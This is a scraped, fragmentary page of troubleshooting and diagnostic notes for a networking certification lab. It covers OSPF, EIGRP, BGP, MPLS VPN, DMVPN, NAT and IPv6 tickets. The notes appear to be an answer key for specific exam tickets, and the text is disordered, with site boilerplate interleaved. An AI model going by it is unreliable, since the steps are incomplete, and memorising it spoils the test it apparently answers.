2.8 Merge Phase 2 - Routing Policies
2.9 IPv6 Routing Part1
2.10 IPv6 Routing Part2
2.11 Multicasting in Jamesons
3.1 Jameson's Branch Offices
3.2 Jameson's Pre-merge VPN
3.3 Merge Phase 2 - VPN
3.4 Inter-VPN Routing
4.1 Device Security
4.2 Network Security
5.1 Centralized DHCP
5.2 Internet Gateway
5.3 First Hop redundancy
5.4 Tracking and Reachability
H2 CONF H2+ CONF
SW3 - VTP server SW3/SW4/SW5/SW6 - VTP Transparent
SW4/SW5/SW6 - VTP client
snmp-traps
Rapid-PVST MST
LACP PAGP
PPP PPP within VRF
OSPF with LSA2 OSPF without LSA2 in DC, the same to the rest
OSPF P2M, stub OSPF in VRF
Named EIGRP with, Tagging Named EIGRP with RIB Scale metric
R15/R16 - AS65005 deny normal redistribution.
default-info originate Default info facing the PE
match internal/ext 2
OSPF, redist bgp metric-ty 1
same (peer-group is iBGP) same (peer-group is iBGP)

TS1 TS2 and DIAG

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

TS1 TS2 and DIAG

Uploaded by

Copyright:

Available Formats

Question/ Troubleshooting Steps

B. check OSPF between SW1 and SW2

C. Check the access List BT5

A. R17 must show 'LCP Open", PPP authentication is no problem

B. R17 can get an IP address and can get a default route

C. Ensure that R11 can ping R17

R11 can telnet to R17, via R12

A. Check the OSPF neighbors

B. Check the route mask - it should be /29

C. Check the load balancing

R1 > 123.45.65.48/29 must be load balance

A. Check the EIGRP k-Values, 1 1 1 1 1

B. Check the EIGRP Neighbor

C. Check distibute list on R13 and R14

D. Check the Off-set list on R12

A. Check the BGP neighbors

B. Check the metics on R4 and R6

C. Check R21 and R22 on the metric or local preference

D. Check the LDP neighbor

Note: if you find that there is no problem on routing, but

B. Check the next-hop

C. Check network statements in R25

A. Check DMVPN on R15

R15 is the hub

Server2 > PC107 (behing R17)

A. Check BGP neighbor

C. Make sure default route can be sent to AS 65101 and 65102

D. Make sure routes of AS65101 and 65102 can be sent to

E. check the NAT and default route next hop

F. check netwoek statement

G. check the backup path

R7 and R18 are configured as backbone for VPN Network

PC106 > trace 8.8.8.8

Q8: MPLS VPN

B. Check the IPSEC VPN

C. Check OSPF neighbor

PC110 can access the Server 1

A. NAS can get an IP Address

B. Check the NAT on R23

R21 must be able to telnet to NAS

ip nhrp nhs 215.0.0.1

R21 (related to Q10)

R4#sh run | s vrf R3#sh run | s vrf

C. Check OSPF, the 4x IP Addresses

User4 (VLAN2000) to R40 Lo0 in Large Office

A. Check the BGP neighbor, sh ip bgp

B.Check SW111 route, and to VLAN 2001

C. On R15, configure next-hop-s

Server 1 needs to ping 8.8.8.8

A. Check the BGP neighbor

B. Check the MED and Access-list

C. OSPF Load Balance

VLANs between DC1 and DC2 need to be load balanced

Origin IGP is preferred over Origin Incomplete

A. Check local pref

A. Check BGP Neighbor, DMVPN config

B.Check OSPF Configuration

R14 is the hub, R14 and R51 are the Spokes

A. Check default route on SW111

C. Check R15 can send the segmet VLAN2001

User1 should ping ISP IPv6 address

A. Check OSPF neighbor

B. Check BGP VPNV4 neigh